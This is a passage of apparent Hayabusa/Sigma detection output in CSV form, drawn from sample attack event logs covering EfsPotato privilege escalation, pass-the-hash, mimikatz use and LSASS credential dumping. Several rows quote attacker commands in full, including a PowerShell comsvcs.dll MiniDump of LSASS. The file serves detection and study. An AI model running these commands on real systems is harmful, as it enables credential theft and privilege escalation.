.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-17 21:26:51.409 +09:00,LAPTOP-JU4M3I0E,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_PetiPotam_etw_rpc_efsr_5_6.evtx -2021-08-23 04:33:38.725 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: c:\temp\EfsPotato.exe whoami : Path: C:\temp\EfsPotato.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.844 +09:00,LAPTOP-JU4M3I0E,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.884 +09:00,LAPTOP-JU4M3I0E,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\temp\EfsPotato.exe whoami,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:38.905 +09:00,LAPTOP-JU4M3I0E,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-08-23 04:33:52.250 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe"" -Embedding : Path: C:\Users\bouss\AppData\Local\Microsoft\OneDrive\21.139.0711.0001\FileCoAuth.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/EfsPotato_sysmon_17_18_privesc_seimpersonate_to_system.evtx -2021-10-19 23:33:13.262 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1201-Password Policy Discovery/ID4688-Password policy discovery via commandline.evtx -2021-10-19 23:40:28.001 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1069-Permission Groups Discovery/ID4688-Group discovery via commandline.evtx -2021-10-19 23:42:41.218 +09:00,FS03.offsec.lan,4728,medium,User added to global security group,Member added: - : SID: S-1-5-21-3410678313-1251427014-1131291384-1004 : Group: None : Subject user: admmig : Subject domain: OFFSEC,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:42:41.234 +09:00,FS03.offsec.lan,4720,medium,Local user account created,User: toto3 : SID:S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx -2021-10-19 23:44:30.780 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx -2021-10-19 23:45:16.394 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx -2021-10-20 22:39:12.731 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,informational,Logon Type 9 - NewCredentials,User: admmig : Workstation: - : IP Address: ::1 : Port: 0 : LogonID: 0x266e045 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:17.315 +09:00,FS03.offsec.lan,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 22:39:21.730 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,PowerShell Get-Process LSASS,,rules/sigma/process_creation/win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:55.808 +09:00,FS03.offsec.lan,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full : Path: C:\Windows\System32\rundll32.exe : User: OFFSEC\admmig : Parent Command: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.089 +09:00,FS03.offsec.lan,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:18:56.105 +09:00,FS03.offsec.lan,10,critical,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/sysmon_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.758 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 49192 : LogonID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.773 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 38940 : LogonID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.836 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.898 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 54742 : LogonID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\2V7Be7Gq.dmp : IP Address: 10.23.123.11,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Sysmon\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,Suspicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_suspicious_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,high,PowerShell Get-Process LSASS in ScriptBlock,,rules/sigma/powershell/powershell_script/powershell_suspicious_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: cscript.exe //e:jscript testme.js : Path: C:\Windows\System32\cscript.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.319 +09:00,LAPTOP-JU4M3I0E,1,medium,WSF/JSE/JS/VBA/VBE File Execution,,rules/sigma/process_creation/win_susp_script_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /generic:Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip /pass:tWIMmIF /user:"""" : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:02.999 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.858 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe"" : Path: C:\Users\bouss\AppData\Local\Temp\Temp3_lync.zip\i.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmdkey.exe"" /delete Microsoft_Windows_Shell_ZipFolder:filename=C:\Users\bouss\AppData\Local\Temp\lync.zip : Path: C:\Windows\System32\cmdkey.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: cscript.exe //e:jscript testme.js",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:12.946 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious ZipExec Execution,,rules/sigma/process_creation/win_pc_susp_zipexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 01:27:14.015 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" popup ""Malicious Behavior Detection Alert"" ""Elastic Security detected Execution via Renamed Signed Binary Proxy"" ""C:\Program Files\Elastic\Endpoint\cache\resources\elastic-endpoint-security.png"" : Path: C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files\Elastic\Endpoint\elastic-endpoint.exe"" run",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_zipexec.evtx -2021-10-22 02:38:36.711 +09:00,FS03.offsec.lan,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx -2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,informational,Bits Job Creation,Job Title: BITS Transfer : URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: mimikatz.exe : Path: C:\TOOLS\Mimikatzx64\mimikatz.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: mimikatz.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID10-Pass the hash Mimikatz memory access.evtx -2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,Suspicious GrantedAccess Flags on LSASS 